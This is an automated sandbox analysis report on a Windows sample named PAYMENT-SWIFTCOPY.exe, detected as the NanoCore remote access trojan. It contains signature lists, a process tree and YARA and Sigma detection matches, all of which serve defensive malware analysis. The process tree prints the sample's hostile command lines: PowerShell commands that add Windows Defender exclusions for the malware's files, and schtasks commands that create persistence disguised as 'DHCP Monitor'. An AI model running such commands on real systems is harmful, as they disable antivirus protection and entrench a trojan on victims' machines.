Loading ...

Play interactive tourEdit tour

Windows Analysis Report PAYMENT-SWIFTCOPY.exe

Overview

General Information

Sample Name:PAYMENT-SWIFTCOPY.exe
Analysis ID:509580
MD5:788c7a25b15a7263c24c4060f0c0df6a
SHA1:c28333f296ea281d90610a0866d5cdb8885fc34b
SHA256:4ba6a3b111db7d0e22339141a17eb368e1882734fe0a22641c46ab94c725bfad
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AntiVM3
Detected Nanocore Rat
System process connects to network (likely due to code injection or exploit)
Yara detected Nanocore RAT
Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell adding suspicious path to exclusion list
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Drops PE files to the startup folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Adds a directory exclusion to Windows Defender
Creates autostart registry keys with suspicious names
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Drops PE files with benign system names
Hides threads from debuggers
Creates an autostart registry key pointing to binary in C:\Windows
Changes security center settings (notifications, updates, antivirus, firewall)
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
Executable has a suspicious name (potential lure to open the executable)
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Stores files to the Windows start menu directory
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Creates files inside the system directory
Found potential string decryption / allocating functions
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Queries disk information (often used to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • PAYMENT-SWIFTCOPY.exe (PID: 3492 cmdline: 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' MD5: 788C7A25B15A7263C24C4060F0C0DF6A)
    • AdvancedRun.exe (PID: 4952 cmdline: 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6036 cmdline: 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe' /SpecialRun 4101d8 4952 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
        • conhost.exe (PID: 4860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6036 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • powershell.exe (PID: 4920 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4720 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6244 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6396 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ???????????????.exe (PID: 6452 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' MD5: 788C7A25B15A7263C24C4060F0C0DF6A)
      • AdvancedRun.exe (PID: 5668 cmdline: 'C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
        • AdvancedRun.exe (PID: 6128 cmdline: 'C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe' /SpecialRun 4101d8 5668 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • powershell.exe (PID: 6400 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 7160 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • powershell.exe (PID: 6680 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6712 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6772 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 4488 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • schtasks.exe (PID: 4956 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpAEFD.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 2272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6028 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpB92F.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 3100 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 2996 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 2968 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5240 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6044 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1940 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3136 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2924 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3056 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6448 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ???????????????.exe (PID: 6836 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' MD5: 788C7A25B15A7263C24C4060F0C0DF6A)
    • AdvancedRun.exe (PID: 4976 cmdline: 'C:\Users\user\AppData\Local\Temp\a1e3c074-cdf7-4e07-abcb-16ac4b773fa2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\a1e3c074-cdf7-4e07-abcb-16ac4b773fa2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 7052 cmdline: 'C:\Users\user\AppData\Local\Temp\a1e3c074-cdf7-4e07-abcb-16ac4b773fa2\AdvancedRun.exe' /SpecialRun 4101d8 4976 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 5748 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6484 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5456 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6884 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4916 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 1544 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
    • RegSvcs.exe (PID: 4920 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • svchost.exe (PID: 5796 cmdline: 'C:\Windows\Cursors\???????????????\svchost.exe' MD5: 788C7A25B15A7263C24C4060F0C0DF6A)
    • AdvancedRun.exe (PID: 7008 cmdline: 'C:\Users\user\AppData\Local\Temp\b0d1990f-10a3-43bc-b57f-e9191c796b30\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b0d1990f-10a3-43bc-b57f-e9191c796b30\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6712 cmdline: 'C:\Users\user\AppData\Local\Temp\b0d1990f-10a3-43bc-b57f-e9191c796b30\AdvancedRun.exe' /SpecialRun 4101d8 7008 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • svchost.exe (PID: 3204 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 5484 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3492 -ip 3492 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 1036 cmdline: 'C:\Windows\Cursors\???????????????\svchost.exe' MD5: 788C7A25B15A7263C24C4060F0C0DF6A)
    • AdvancedRun.exe (PID: 6792 cmdline: 'C:\Users\user\AppData\Local\Temp\f45e65ee-34b0-4b09-bb00-47b7b675bf5c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f45e65ee-34b0-4b09-bb00-47b7b675bf5c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6632 cmdline: 'C:\Users\user\AppData\Local\Temp\f45e65ee-34b0-4b09-bb00-47b7b675bf5c\AdvancedRun.exe' /SpecialRun 4101d8 6792 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 7024 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2964 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6536 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • RegSvcs.exe (PID: 5000 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 3560 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 2832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 4964 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • dhcpmon.exe (PID: 6568 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6604 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
PAYMENT-SWIFTCOPY.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x253a3:$x1: https://cdn.discordapp.com/attachments/
  • 0x25457:$x1: https://cdn.discordapp.com/attachments/

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\Cursors\???????????????\svchost.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x253a3:$x1: https://cdn.discordapp.com/attachments/
  • 0x25457:$x1: https://cdn.discordapp.com/attachments/
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x253a3:$x1: https://cdn.discordapp.com/attachments/
  • 0x25457:$x1: https://cdn.discordapp.com/attachments/

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001D.00000002.558493568.000000000542F000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x102b5:$x1: NanoCore.ClientPluginHost
  • 0x102f2:$x2: IClientNetworkHost
  • 0x13e25:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001D.00000002.558493568.000000000542F000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    0000001D.00000002.558493568.000000000542F000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x1001d:$a: NanoCore
    • 0x1002d:$a: NanoCore
    • 0x10261:$a: NanoCore
    • 0x10275:$a: NanoCore
    • 0x102b5:$a: NanoCore
    • 0x1007c:$b: ClientPlugin
    • 0x1027e:$b: ClientPlugin
    • 0x102be:$b: ClientPlugin
    • 0x101a3:$c: ProjectData
    • 0x10baa:$d: DESCrypto
    • 0x18576:$e: KeepAlive
    • 0x16564:$g: LogClientMessage
    • 0x1275f:$i: get_Connected
    • 0x10ee0:$j: #=q
    • 0x10f10:$j: #=q
    • 0x10f2c:$j: #=q
    • 0x10f5c:$j: #=q
    • 0x10f78:$j: #=q
    • 0x10f94:$j: #=q
    • 0x10fc4:$j: #=q
    • 0x10fe0:$j: #=q
    0000001F.00000002.573231147.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xff8d:$x1: NanoCore.ClientPluginHost
    • 0xffca:$x2: IClientNetworkHost
    • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    0000001F.00000002.573231147.0000000000402000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 60 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.0.PAYMENT-SWIFTCOPY.exe.8120000.9.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        0.0.PAYMENT-SWIFTCOPY.exe.8120000.9.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0.0.PAYMENT-SWIFTCOPY.exe.830000.0.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
          • 0x253a3:$x1: https://cdn.discordapp.com/attachments/
          • 0x25457:$x1: https://cdn.discordapp.com/attachments/
          0.0.PAYMENT-SWIFTCOPY.exe.9191098.14.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            0.0.PAYMENT-SWIFTCOPY.exe.9191098.14.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              Click to see the 26 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
              Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' , ParentImage: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe, ParentProcessId: 3492, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe, ProcessId: 4488
              Sigma detected: Powershell Defender ExclusionShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' , ParentImage: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe, ParentProcessId: 3492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force, ProcessId: 6036
              Sigma detected: Possible Applocker BypassShow sources
              Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' , ParentImage: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe, ParentProcessId: 3492, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe, ProcessId: 4488
              Sigma detected: Non Interactive PowerShellShow sources
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' , ParentImage: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe, ParentProcessId: 3492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force, ProcessId: 6036
              Sigma detected: T1086 PowerShell ExecutionShow sources
              Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132797684744169831.6036.DefaultAppDomain.powershell

              Malware Analysis System Evasion:

              barindex
              Sigma detected: Powershell adding suspicious path to exclusion listShow sources
              Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' , ParentImage: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe, ParentProcessId: 3492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force, ProcessId: 4720

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Yara detected Nanocore RATShow sources
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001D.00000002.558493568.000000000542F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.573231147.0000000000402000.00000040.00000001.sdmp, type: MEMORY
